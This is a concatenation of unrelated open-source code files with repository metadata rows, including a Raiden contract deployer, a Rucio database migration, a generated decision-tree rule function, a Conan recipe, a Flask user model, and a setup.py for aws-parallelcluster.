deployed_contracts["contracts"][CONTRACT_SECRET_REGISTRY] = deepcopy(
reused_contracts[CONTRACT_SECRET_REGISTRY]
)
else:
secret_registry = self._deploy_and_remember(
contract_name=CONTRACT_SECRET_REGISTRY,
arguments=[],
deployed_contracts=deployed_contracts,
)
token_network_registry_args = [
secret_registry.address,
deployed_contracts["chain_id"],
settle_timeout_min,
settle_timeout_max,
]
if max_num_of_token_networks:
token_network_registry_args.append(max_num_of_token_networks)
self._deploy_and_remember(
contract_name=CONTRACT_TOKEN_NETWORK_REGISTRY,
arguments=token_network_registry_args,
deployed_contracts=deployed_contracts,
)
return deployed_contracts
def _deploy_and_remember(
self, contract_name: str, arguments: List, deployed_contracts: DeployedContracts
) -> Contract:
""" Deploys contract_name with arguments and store the result in deployed_contracts. """
receipt = self.deploy(contract_name, arguments)
deployed_contracts["contracts"][contract_name] = _deployed_data_from_receipt(
receipt=receipt, constructor_arguments=arguments
)
return self.web3.eth.contract(
abi=self.contract_manager.get_contract_abi(contract_name),
address=deployed_contracts["contracts"][contract_name]["address"],
)
def register_token_network(
self,
token_registry_abi: List[Dict[str, Any]],
token_registry_address: str,
token_address: str,
channel_participant_deposit_limit: Optional[int],
token_network_deposit_limit: Optional[int],
) -> HexAddress:
"""Register token with a TokenNetworkRegistry contract."""
with_limits = contracts_version_expects_deposit_limits(self.contracts_version)
if with_limits:
return self._register_token_network_with_limits(
token_registry_abi,
token_registry_address,
token_address,
channel_participant_deposit_limit,
token_network_deposit_limit,
)
else:
return self._register_token_network_without_limits(
token_registry_abi,
token_registry_address,
token_address,
channel_participant_deposit_limit,
token_network_deposit_limit,
)
def _register_token_network_without_limits(
self,
token_registry_abi: List[Dict[str, Any]],
token_registry_address: str,
token_address: str,
channel_participant_deposit_limit: Optional[int],
token_network_deposit_limit: Optional[int],
) -> HexAddress:
"""Register token with a TokenNetworkRegistry contract
with a contracts-version that doesn't require deposit limits in the TokenNetwork
constructor.
"""
if channel_participant_deposit_limit:
raise ValueError(
"contracts_version below 0.9.0 does not expect "
"channel_participant_deposit_limit"
)
if token_network_deposit_limit:
raise ValueError(
"contracts_version below 0.9.0 does not expect token_network_deposit_limit"
)
token_network_registry = self.web3.eth.contract(
abi=token_registry_abi, address=token_registry_address
)
command = token_network_registry.functions.createERC20TokenNetwork(token_address)
self.transact(command)
token_network_address = token_network_registry.functions.token_to_token_networks(
token_address
).call()
token_network_address = to_checksum_address(token_network_address)
LOG.debug(f"TokenNetwork address: {token_network_address}")
return token_network_address
def _register_token_network_with_limits(
self,
token_registry_abi: List[Dict[str, Any]],
token_registry_address: str,
token_address: str,
channel_participant_deposit_limit: Optional[int],
token_network_deposit_limit: Optional[int],
) -> HexAddress:
"""Register token with a TokenNetworkRegistry contract
with a contracts-version that requires deposit limits in the TokenNetwork
constructor.
"""
if channel_participant_deposit_limit is None:
raise ValueError(
"contracts_version 0.9.0 and afterwards expect "
"channel_participant_deposit_limit"
)
if token_network_deposit_limit is None:
raise ValueError(
"contracts_version 0.9.0 and afterwards expect " "token_network_deposit_limit"
)
token_network_registry = self.web3.eth.contract(
abi=token_registry_abi, address=token_registry_address
)
command = token_network_registry.functions.createERC20TokenNetwork(
_token_address=token_address,
_channel_participant_deposit_limit=channel_participant_deposit_limit,
_token_network_deposit_limit=token_network_deposit_limit,
)
self.transact(command)
token_network_address = token_network_registry.functions.token_to_token_networks(
token_address
).call()
token_network_address = to_checksum_address(token_network_address)
LOG.debug(f"TokenNetwork address: {token_network_address}")
return token_network_address
def deploy_service_contracts(
self,
token_address: HexAddress,
user_deposit_whole_balance_limit: int,
service_registry_controller: HexAddress,
initial_service_deposit_price: int,
service_deposit_bump_numerator: int,
service_deposit_bump_denominator: int,
decay_constant: int,
min_price: int,
registration_duration: int,
token_network_registry_address: HexAddress,
) -> DeployedContracts:
"""Deploy 3rd party service contracts"""
if not contracts_version_has_initial_service_deposit(
self.contract_manager.contracts_version
):
raise RuntimeError("Deployment of older service contracts is not suppported.")
chain_id = int(self.web3.version.network)
deployed_contracts: DeployedContracts = {
"contracts_version": self.contract_manager.contracts_version,
"chain_id": chain_id,
"contracts": {},
}
service_registry = self._deploy_and_remember(
CONTRACT_SERVICE_REGISTRY,
[
token_address,
service_registry_controller,
initial_service_deposit_price,
service_deposit_bump_numerator,
service_deposit_bump_denominator,
decay_constant,
min_price,
registration_duration,
],
deployed_contracts,
)
user_deposit = self._deploy_and_remember(
contract_name=CONTRACT_USER_DEPOSIT,
arguments=[token_address, user_deposit_whole_balance_limit],
deployed_contracts=deployed_contracts,
)
monitoring_service_constructor_args = [
token_address,
deployed_contracts["contracts"][CONTRACT_SERVICE_REGISTRY]["address"],
deployed_contracts["contracts"][CONTRACT_USER_DEPOSIT]["address"],
token_network_registry_address,
]
msc = self._deploy_and_remember(
contract_name=CONTRACT_MONITORING_SERVICE,
arguments=monitoring_service_constructor_args,
deployed_contracts=deployed_contracts,
)
one_to_n = self._deploy_and_remember(
contract_name=CONTRACT_ONE_TO_N,
arguments=[user_deposit.address, chain_id, service_registry.address],
deployed_contracts=deployed_contracts,
)
# Tell the UserDeposit instance about other contracts.
LOG.debug(
"Calling UserDeposit.init() with "
f"msc_address={msc.address} "
f"one_to_n_address={one_to_n.address}"
)
self.transact(
user_deposit.functions.init(
_msc_address=msc.address, _one_to_n_address=one_to_n.address
)
)
return deployed_contracts
def _deployed_data_from_receipt(receipt: Dict, constructor_arguments: List) -> DeployedContract:
return {
"address": to_checksum_address(receipt["contractAddress"]),
"transaction_hash": encode_hex(receipt["transactionHash"]),
"block_number": receipt["blockNumber"],
"gas_cost": receipt["gasUsed"],
"constructor_arguments": constructor_arguments,
}
| 39.783715 | 99 | 0.664854 |
794617d0128f5db9d05c9f897dbb0803c804e28a | 949 | py | Python | shell/__init__.py | jack1142/JackCogs | ad3b5c43e4597f92816db8f0974f8f61d511abc3 | [
"Apache-2.0"
] | 18 | 2019-01-18T07:00:26.000Z | 2021-09-22T00:12:40.000Z | shell/__init__.py | jack1142/JackCogs | ad3b5c43e4597f92816db8f0974f8f61d511abc3 | [
"Apache-2.0"
] | 43 | 2019-04-28T01:31:17.000Z | 2022-03-08T02:17:55.000Z | shell/__init__.py | jack1142/JackCogs | ad3b5c43e4597f92816db8f0974f8f61d511abc3 | [
"Apache-2.0"
] | 20 | 2020-01-21T10:49:37.000Z | 2022-03-21T02:16:45.000Z | # Copyright 2018-2021 Jakub Kuczys (https://github.com/jack1142)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from pathlib import Path
from redbot.core.bot import Red
from .shell import Shell
with open(Path(__file__).parent / "info.json") as fp:
__red_end_user_data_statement__ = json.load(fp)["end_user_data_statement"]
async def setup(bot: Red) -> None:
cog = Shell(bot)
await cog.initialize()
bot.add_cog(cog)
| 31.633333 | 78 | 0.74921 |
794618305073dfca1b6c2753077ddf141c84edd4 | 1,272 | py | Python | singular-format-new.py | gourishankarseal/Assignment-Cohomology-of-Bott-Samelson-manifolds | a8e4fc67e48928894e638b6944759c548061fcf7 | [
"MIT"
] | null | null | null | singular-format-new.py | gourishankarseal/Assignment-Cohomology-of-Bott-Samelson-manifolds | a8e4fc67e48928894e638b6944759c548061fcf7 | [
"MIT"
] | null | null | null | singular-format-new.py | gourishankarseal/Assignment-Cohomology-of-Bott-Samelson-manifolds | a8e4fc67e48928894e638b6944759c548061fcf7 | [
"MIT"
] | null | null | null | name = ["A"];
n = int(raw_input("Enter number of fixed points:"))
for i in range(1,n+1):
name = name + ["test"+`i`];
# List name should look like this:
#name = ["A", "test1", "test2", "test3", "test4", "test5", "test6", "test7", "test8"];
fp = len(name);
for j in range(0,fp):
f=open(name[j])
lines=f.read().splitlines()
#print(len(lines))
foo=open('Singular'+name[j],'wb+')
if len(lines)>1:
for i in range(0,len(lines)):
foo.write('vector s'+`i+1`+'='+'['+lines[i]+'];\n')
string = ""
if len(lines)>1:
for i in range(0,len(lines)):
if i == 0:
string = 's' +`i+1`
else:
string = string + ','+'s' +`i+1`
#print string+';'
if len(lines)>1:
foo.write('module m'+'='+ string + ';')
f.close()
foo.close()
import string
foo=open('Singularlists','wb+')
#n = int(raw_input("Enter number of files to be formatted:"))
vertex = [];
for i in range(1,n+1):
vertex = vertex + [i]
s = str(vertex);
foo.write("list vertex" + "=" + s[1:len(s)-1] + ";")
sing = [];
for i in range(1,n+1):
sing = sing + ["\"Singulartest"+`i`+"\""] # Note the bounding ""
s = str(sing).replace('\'',''); #this replaces the '' with a blank character
foo.write("\n\nlist sing "+ "=" + str(s[1:len(s)-1])+";")
foo.close()
| 14.964706 | 86 | 0.545597 |
7946185da63c8a9d9f675167708cde789e3321d4 | 2,300 | py | Python | lib/rucio/db/sqla/migrate_repo/versions/277b5fbb41d3_switch_heartbeats_executable.py | nimishbongale/rucio | 21c93bd7d02dbc70bc3127ad77fb1a1981b83058 | [
"Apache-2.0"
] | null | null | null | lib/rucio/db/sqla/migrate_repo/versions/277b5fbb41d3_switch_heartbeats_executable.py | nimishbongale/rucio | 21c93bd7d02dbc70bc3127ad77fb1a1981b83058 | [
"Apache-2.0"
] | null | null | null | lib/rucio/db/sqla/migrate_repo/versions/277b5fbb41d3_switch_heartbeats_executable.py | nimishbongale/rucio | 21c93bd7d02dbc70bc3127ad77fb1a1981b83058 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' switch heartbeats executable '''
import sqlalchemy as sa
from alembic import context
from alembic.op import create_primary_key, add_column, drop_constraint, drop_column
from rucio.db.sqla.models import String
# Alembic revision identifiers
revision = '277b5fbb41d3'
down_revision = '44278720f774'
def upgrade():
'''
Upgrade the database to this revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
drop_constraint('heartbeats_pk', 'heartbeats', type_='primary')
schema = context.get_context().version_table_schema if context.get_context().version_table_schema else ''
drop_column('heartbeats', 'executable', schema=schema)
add_column('heartbeats', sa.Column('executable', String(64)), schema=schema)
add_column('heartbeats', sa.Column('readable', String(4000)), schema=schema)
create_primary_key('HEARTBEATS_PK', 'heartbeats', ['executable', 'hostname', 'pid', 'thread_id'])
def downgrade():
'''
Downgrade the database to the previous revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
drop_constraint('heartbeats_pk', 'heartbeats', type_='primary')
schema = context.get_context().version_table_schema if context.get_context().version_table_schema else ''
drop_column('heartbeats', 'executable', schema=schema)
drop_column('heartbeats', 'readable', schema=schema)
add_column('heartbeats', sa.Column('executable', String(767)), schema=schema)
create_primary_key('HEARTBEATS_PK', 'heartbeats', ['executable', 'hostname', 'pid', 'thread_id'])
| 40.350877 | 113 | 0.72 |
7946190009f89f5e1895590f9a2efdb2024346d0 | 7,100 | py | Python | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/11_features/numtrees_8/rule_5.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/11_features/numtrees_8/rule_5.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/11_features/numtrees_8/rule_5.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | def findDecision(obj): #obj[0]: Passanger, obj[1]: Time, obj[2]: Coupon, obj[3]: Age, obj[4]: Education, obj[5]: Occupation, obj[6]: Bar, obj[7]: Coffeehouse, obj[8]: Restaurant20to50, obj[9]: Direction_same, obj[10]: Distance
# {"feature": "Coupon", "instances": 127, "metric_value": 0.9762, "depth": 1}
if obj[2]>0:
# {"feature": "Passanger", "instances": 106, "metric_value": 0.9245, "depth": 2}
if obj[0]>0:
# {"feature": "Occupation", "instances": 98, "metric_value": 0.9486, "depth": 3}
if obj[5]>4:
# {"feature": "Bar", "instances": 68, "metric_value": 0.874, "depth": 4}
if obj[6]<=1.0:
# {"feature": "Coffeehouse", "instances": 46, "metric_value": 0.7131, "depth": 5}
if obj[7]<=2.0:
# {"feature": "Age", "instances": 36, "metric_value": 0.8113, "depth": 6}
if obj[3]>1:
# {"feature": "Education", "instances": 19, "metric_value": 0.9495, "depth": 7}
if obj[4]<=3:
# {"feature": "Time", "instances": 17, "metric_value": 0.874, "depth": 8}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.9403, "depth": 9}
if obj[8]>0.0:
# {"feature": "Distance", "instances": 13, "metric_value": 0.8905, "depth": 10}
if obj[10]>1:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.8813, "depth": 11}
if obj[9]<=0:
return 'True'
else: return 'True'
elif obj[10]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.9183, "depth": 11}
if obj[9]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[4]>3:
return 'False'
else: return 'False'
elif obj[3]<=1:
# {"feature": "Distance", "instances": 17, "metric_value": 0.5226, "depth": 7}
if obj[10]>1:
# {"feature": "Time", "instances": 10, "metric_value": 0.7219, "depth": 8}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.5033, "depth": 9}
if obj[9]<=0:
return 'True'
elif obj[9]>0:
# {"feature": "Education", "instances": 2, "metric_value": 1.0, "depth": 10}
if obj[4]<=2:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 1.0, "depth": 11}
if obj[8]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
return 'False'
else: return 'False'
elif obj[10]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>2.0:
return 'True'
else: return 'True'
elif obj[6]>1.0:
# {"feature": "Education", "instances": 22, "metric_value": 1.0, "depth": 5}
if obj[4]<=2:
# {"feature": "Distance", "instances": 20, "metric_value": 0.9928, "depth": 6}
if obj[10]<=2:
# {"feature": "Coffeehouse", "instances": 18, "metric_value": 0.9641, "depth": 7}
if obj[7]<=2.0:
# {"feature": "Age", "instances": 13, "metric_value": 0.9957, "depth": 8}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.9799, "depth": 9}
if obj[9]<=0:
# {"feature": "Time", "instances": 11, "metric_value": 0.9457, "depth": 10}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 10, "metric_value": 0.971, "depth": 11}
if obj[8]<=2.0:
return 'False'
elif obj[8]>2.0:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'False'
else: return 'False'
elif obj[9]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[7]>2.0:
return 'True'
else: return 'True'
elif obj[10]>2:
return 'False'
else: return 'False'
elif obj[4]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]<=4:
# {"feature": "Age", "instances": 30, "metric_value": 0.9968, "depth": 4}
if obj[3]<=4:
# {"feature": "Restaurant20to50", "instances": 23, "metric_value": 0.9877, "depth": 5}
if obj[8]<=1.0:
# {"feature": "Bar", "instances": 17, "metric_value": 0.9975, "depth": 6}
if obj[6]<=1.0:
# {"feature": "Time", "instances": 12, "metric_value": 0.9799, "depth": 7}
if obj[1]<=3:
# {"feature": "Education", "instances": 9, "metric_value": 0.9911, "depth": 8}
if obj[4]<=2:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 1.0, "depth": 9}
if obj[7]>0.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.9183, "depth": 10}
if obj[9]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.7219, "depth": 11}
if obj[10]<=2:
return 'False'
elif obj[10]>2:
return 'True'
else: return 'True'
elif obj[9]>0:
return 'True'
else: return 'True'
elif obj[7]<=0.0:
return 'True'
else: return 'True'
elif obj[4]>2:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[6]>1.0:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.7219, "depth": 7}
if obj[7]<=3.0:
return 'False'
elif obj[7]>3.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Time", "instances": 6, "metric_value": 0.65, "depth": 6}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 1.0, "depth": 7}
if obj[4]>2:
return 'False'
elif obj[4]<=2:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[3]>4:
# {"feature": "Time", "instances": 7, "metric_value": 0.5917, "depth": 5}
if obj[1]<=3:
return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[2]<=0:
# {"feature": "Education", "instances": 21, "metric_value": 0.7919, "depth": 2}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
# {"feature": "Distance", "instances": 10, "metric_value": 1.0, "depth": 3}
if obj[10]<=2:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.8631, "depth": 4}
if obj[5]>2:
return 'True'
elif obj[5]<=2:
return 'False'
else: return 'False'
elif obj[10]>2:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
| 37.368421 | 226 | 0.511268 |
794619a3eb1c558b6756b0bad6fea5eb05b2f850 | 2,084 | py | Python | recipes/libsvm/all/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 562 | 2019-09-04T12:23:43.000Z | 2022-03-29T16:41:43.000Z | recipes/libsvm/all/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 9,799 | 2019-09-04T12:02:11.000Z | 2022-03-31T23:55:45.000Z | recipes/libsvm/all/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 1,126 | 2019-09-04T11:57:46.000Z | 2022-03-31T16:43:38.000Z | from conans import ConanFile, tools, CMake
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.33.0"
class libsvmConan(ConanFile):
name = "libsvm"
description = "Libsvm is a simple, easy-to-use, and efficient software for SVM classification and regression"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://www.csie.ntu.edu.tw/~cjlin/libsvm/"
license = "BSD-3-Clause"
topics = ("conan", "svm", "vector")
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
def validate(self):
if (
self.settings.compiler == "Visual Studio" and
"MT" in self.settings.compiler.runtime and
self.options.shared
):
raise ConanInvalidConfiguration(
"{} can not be built as shared library + runtime {}.".format(
self.name,
self.settings.compiler.runtime
)
)
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _configure_cmake(self):
if not self._cmake:
self._cmake = CMake(self)
self._cmake.configure()
return self._cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("COPYRIGHT", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = ["svm"]
| 31.104478 | 113 | 0.603647 |
794619c716f77e67926aaa4e18203d3e0c4c760a | 2,235 | py | Python | yitu/models/user.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 4 | 2017-06-30T01:32:52.000Z | 2019-07-03T15:46:24.000Z | yitu/models/user.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 3 | 2021-03-22T17:13:51.000Z | 2021-12-13T19:40:20.000Z | yitu/models/user.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | null | null | null | """
Author: Tyan boot <[email protected]>
Date: 2017/6/20
"""
# -*- coding: utf-8 -*-
from itsdangerous import TimedJSONWebSignatureSerializer
from yitu import db
from yitu.models.book_list import BookList
from yitu.models.subscribe import Subscribe
from flask import g
class User(db.Model):
__tablename__ = "users"
id_ = db.Column(db.Integer, primary_key=True)
xh = db.Column(db.String(10), unique=True, index=True)
name = db.Column(db.Text)
password_hash = db.Column(db.Text)
subscribing = db.relationship('Subscribe',
foreign_keys=[Subscribe.user_id],
backref=db.backref('user', lazy='joined'))
book_lists = db.relationship("BookList",
foreign_keys=BookList.user_id,
backref=db.backref('user', lazy='joined'))
@staticmethod
def verify_token(token):
from flask import current_app
expire_time = current_app.config.get("EXPIRES_TIME") or 3600
token_key = current_app.config["APP_KEY"]
s = TimedJSONWebSignatureSerializer(token_key, expires_in=expire_time)
try:
d = s.loads(token)
user = User.query.get(d["uid"])
g.session_id = d["session"]
return user
except:
return None
@property
def password(self):
return None
@password.setter
def password(self, pwd):
import hashlib
s = hashlib.sha1()
s.update(pwd.encode("ascii"))
self.password_hash = s.hexdigest()
def verify_password(self, pwd):
import hashlib
s = hashlib.sha1()
s.update(pwd.encode("ascii"))
if s.hexdigest() != self.password_hash:
return False
else:
return True
def generate_token(self, session):
from flask import current_app
expire_time = current_app.config.get("EXPIRES_TIME") or 3600
token_key = current_app.config["APP_KEY"]
s = TimedJSONWebSignatureSerializer(token_key, expires_in=expire_time)
d = s.dumps({"username": self.xh, "uid": self.id_, "session": session})
return d.decode("ascii")
| 27.9375 | 79 | 0.605369 |
79461b73541bd0905e066cb05d8ff23209216b4d | 397 | py | Python | filelocker/wsgi.py | Yogeswari-Sahu/HackOff | 0c66e13dafc15f354fe5d8058a68a24532fbf3c0 | [
"MIT"
] | 1 | 2020-12-29T17:24:19.000Z | 2020-12-29T17:24:19.000Z | filelocker/filelocker/wsgi.py | Hawk453/HackOff | 41d7b44ae3777e95d1e1d8f2284241907f15f3c3 | [
"MIT"
] | null | null | null | filelocker/filelocker/wsgi.py | Hawk453/HackOff | 41d7b44ae3777e95d1e1d8f2284241907f15f3c3 | [
"MIT"
] | 3 | 2020-12-13T09:43:27.000Z | 2020-12-13T19:52:12.000Z | """
WSGI config for filelocker project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'filelocker.settings')
application = get_wsgi_application()
| 23.352941 | 78 | 0.788413 |
79461baec98140d266b1fe3450d3334ba0d903e2 | 661 | py | Python | evaluador_consola.py | RicardoGomezT/Normalizacion_JSON_con_PySpark | 129e9fa1b4f32af1da3aff47741623cafa669ed4 | [
"MIT"
] | null | null | null | evaluador_consola.py | RicardoGomezT/Normalizacion_JSON_con_PySpark | 129e9fa1b4f32af1da3aff47741623cafa669ed4 | [
"MIT"
] | null | null | null | evaluador_consola.py | RicardoGomezT/Normalizacion_JSON_con_PySpark | 129e9fa1b4f32af1da3aff47741623cafa669ed4 | [
"MIT"
] | null | null | null | {"consumidor":{"app_consumer":{"id":"BUN-09348","session_id":"07e3ged1520","transaction_id":"12345"},"device_consumer":{"id":"device-111","user_agent":"Mozilla/5.0(iPhone)","locale":"CO","ip":"200.122.xxx.254","terminal_id":"372343"}},"operacion":{"type":"CONSULTA","operation_date":"2019-08-13T20:00:54.832Z","source_reference":{"type":"PRODUCT","product":{"type":"0160","details_product":{"details":[{"detail_item":{"name":"SOLICITUD","value":"123"}}]}}},"status_response":{"status":"OK"}},"messages_respuesta":{"service":[{"service_details":{"id_service":"","request_service":"</soapenv:Envelope>","response_service":"<SResponse></S:Body></S:Envelope>"}}]}} | 661 | 661 | 0.686838 |
79461c1ac8f355b7136c503db580e69d25612a6a | 2,795 | py | Python | cli/setup.py | ddeidda/aws-parallelcluster | b1f468d2283168dfd2992f791cee79bef3a4920a | [
"Apache-2.0"
] | null | null | null | cli/setup.py | ddeidda/aws-parallelcluster | b1f468d2283168dfd2992f791cee79bef3a4920a | [
"Apache-2.0"
] | 1 | 2020-11-16T11:07:22.000Z | 2020-11-16T11:07:22.000Z | cli/setup.py | rexcsn/aws-parallelcluster | be5f5fd926e4bd942df3da907351e5de99d49485 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import os
from setuptools import find_packages, setup
def readme():
"""Read the README file and use it as long description."""
with open(os.path.join(os.path.dirname(__file__), "README")) as f:
return f.read()
VERSION = "2.10.3"
REQUIRES = [
"setuptools",
"boto3>=1.16.14",
"tabulate>=0.8.2,<0.8.10",
"ipaddress>=1.0.22",
"PyYAML>=5.3.1",
"jinja2>=2.11.0",
]
setup(
name="aws-parallelcluster",
version=VERSION,
author="Amazon Web Services",
description="AWS ParallelCluster is an AWS supported Open Source cluster management tool to deploy "
"and manage HPC clusters in the AWS cloud.",
url="https://github.com/aws/aws-parallelcluster",
license="Apache License 2.0",
package_dir={"": "src"},
packages=find_packages("src"),
python_requires=">=3.6",
install_requires=REQUIRES,
entry_points={
"console_scripts": [
"pcluster = pcluster.cli:main",
"pcluster-config = pcluster_config.cli:main",
"awsbqueues = awsbatch.awsbqueues:main",
"awsbhosts = awsbatch.awsbhosts:main",
"awsbstat = awsbatch.awsbstat:main",
"awsbkill = awsbatch.awsbkill:main",
"awsbsub = awsbatch.awsbsub:main",
"awsbout = awsbatch.awsbout:main",
]
},
include_package_data=True,
zip_safe=False,
package_data={"": ["src/examples/config"]},
long_description=readme(),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering",
"License :: OSI Approved :: Apache Software License",
],
project_urls={
"Changelog": "https://github.com/aws/aws-parallelcluster/blob/develop/CHANGELOG.md",
"Issue Tracker": "https://github.com/aws/aws-parallelcluster/issues",
"Documentation": "https://docs.aws.amazon.com/parallelcluster/",
},
)
| 34.9375 | 119 | 0.643649 |
79461cd1730cdb3f451b546c2c6cf7b9f58a8d9f | 854 | py | Python | backend/StaticCodeAnalyzer/urls.py | Compro-Prasad/CAST-static-code-analyzer | a3ab84fa7fdc176960a6c535bb8705cedf92bcad | [
"MIT"
] | null | null | null | backend/StaticCodeAnalyzer/urls.py | Compro-Prasad/CAST-static-code-analyzer | a3ab84fa7fdc176960a6c535bb8705cedf92bcad | [
"MIT"
] | 7 | 2021-06-04T21:52:24.000Z | 2022-02-26T11:33:16.000Z | backend/StaticCodeAnalyzer/urls.py | Compro-Prasad/CAST-static-code-analyzer | a3ab84fa7fdc176960a6c535bb8705cedf92bcad | [
"MIT"
] | null | null | null | """StaticCodeAnalyzer URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import url
from .views import analyze
urlpatterns = [
path('admin/', admin.site.urls),
url(r'^analyze/$', analyze),
]
| 32.846154 | 77 | 0.713115 |
79461cd8df5953d2ccf7ceb01c8b5892a82df91c | 23,426 | py | Python | static/SciKGraph.py | maurodlt/SciKGraph | 83688fbcd827cdec1662760531b1b3e78e09575a | [
"AFL-1.1"
] | 5 | 2020-09-08T21:22:30.000Z | 2022-01-15T10:56:24.000Z | static/bla/SciKGraph.py | maurodlt/SciKGraph | 83688fbcd827cdec1662760531b1b3e78e09575a | [
"AFL-1.1"
] | null | null | null | static/bla/SciKGraph.py | maurodlt/SciKGraph | 83688fbcd827cdec1662760531b1b3e78e09575a | [
"AFL-1.1"
] | 1 | 2021-01-20T20:43:21.000Z | 2021-01-20T20:43:21.000Z | import string
import networkx as nx
import re
import sys
from nltk import word_tokenize, pos_tag
from pybabelfy.babelfy import *
from nltk.stem import PorterStemmer
from math import log
import pickle
import glob
